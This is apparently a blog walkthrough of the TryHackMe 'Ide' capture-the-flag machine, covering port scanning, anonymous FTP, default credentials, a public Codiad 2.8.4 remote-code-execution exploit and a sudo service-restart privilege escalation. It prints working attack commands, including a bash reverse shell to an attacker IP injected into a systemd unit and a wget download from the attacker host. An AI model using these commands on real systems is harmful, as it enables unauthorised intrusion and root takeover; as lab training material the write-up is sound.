Ide CTF Walkthorugh
Intro
Welcome into the new Ide challenge, here is the link to the web-page on TryHackMe. To solve the room we will have to do some enumeration, looking scrupulously everywhere, locate the vulnerability and exploit it to gain the initial access. Finally we will have to do a bit of privilege escalation to become root and read the flag.
​
Whenever you feel ready press "Start Machine" and connect via OpenVPN or use the AttackBox.
​
Let's do it!
​
The Challenge
Let's begin with a port scan with nmap:
nmap -sV -p- MACHINE_IP
​
Here is what we got:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
​
(my suggestion is to first do the quick scan on common ports, when you get the output you start investigating it, while at the same time you start the longer scan on all the ports)
​
Logging into the FTP server with the anonymous user and giving a looks around:
cd ...
get -
​
Reading the file we can understand that some passwords have been resetted and the guy suggest to use the default credentials. So we know the username is john and for the default password i have tried some of the commons default ones and the top used, came out it is REDACTED, quite easy, but we could also brute force it.
​
Navigating to http://ide.thm:62337/ we can notice it is running Codiad 2.8.4. With a quick search in exploitDB we can see there is an RCE exploit, here is the link to the GitHub repo.
​
We can clone the repository to our device:
git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
​
Now run the exploit inserting the target and your IP:
python3 exploit.py http://MACHINE_IP:62337/ john password ATTACKER-IP 62337 linux
​
Follow the instruction in the terminal and open up the listener and in a couple of seconds you will have the shell.
​
Looking around we can see that there is a use called drac, so we need to login as this guy.
We can speed up things downloading Linpeas to the target machine, which will scan for some vulnerabilities, clear text creds and other vector to escalate our privileges.
​
If you do not have it installed do: sudo apt install peass, and copy the .sh file in the current working directory with:
cp /usr/share/peass/linpeas/linpeas.sh .
​
On your machine, in the directory with the linpeas.sh file we can create a simple python server:
python3 -m http.server
​
On the target navigate to the /tmp directory and download the script:
cd /tmp
wget http://ATTACKER-IP:8000/linpeas.sh
​
Now make the file executable and run it:
chmod +x linpeas.sh
./linpeas.sh
​
Reading trough the tool's report we can see that the poor Drac has its password exposed at: REDACTED
​
Now we can either change use with su drac if you have upgraded the reverse-shell or SSH as him. If you chose SSH method:
ssh drac@MACHINE_IP
​
If you want to upgrade the current revserse-hell follow this guide.
​
Once logged in we can get our first flag:
cat /home/drac/user.txt
​
Privilege Escalation
The last objective is to gain the root access to get the flag, lets do it!
We can check what we can run as sudo with drac user:
sudo -l
​
We get this output:
User drac may run the following commands on ide: (ALL : ALL) /usr/sbin/service vsftpd restart
​
This means that we can run as super user the command to restart the FTP server.
To exploit it we have to find the config file first:
find / -name "*vsftpd*"
​
I found there are 2 locations, but checking the files permissions we are allowed to modify only the second one:
/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service
Now we can make some changes:
nano /etc/systemd/system/multi-user.target.wants/vsftpd.service
​
9 ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/1234 0>&1'
​
Basically we are only modifying line 9, this way when the service start will make a connection to our machine and, since we are restarting the service as super user, we will be logged in as root.
​
Reload the daemon:
systemctl daemon-reload
​
Everything looks ready, on our machine we can start a listener:
nc -lvnp 1234
​
And on the target finally execute as sudo the command:
sudo /usr/sbin/service vsftpd restart
​
Finally we can get the flag
cat /root/root.txt
Congratulations you have successfully pwnded the Ide machine.
Catch you in the next CTF 😃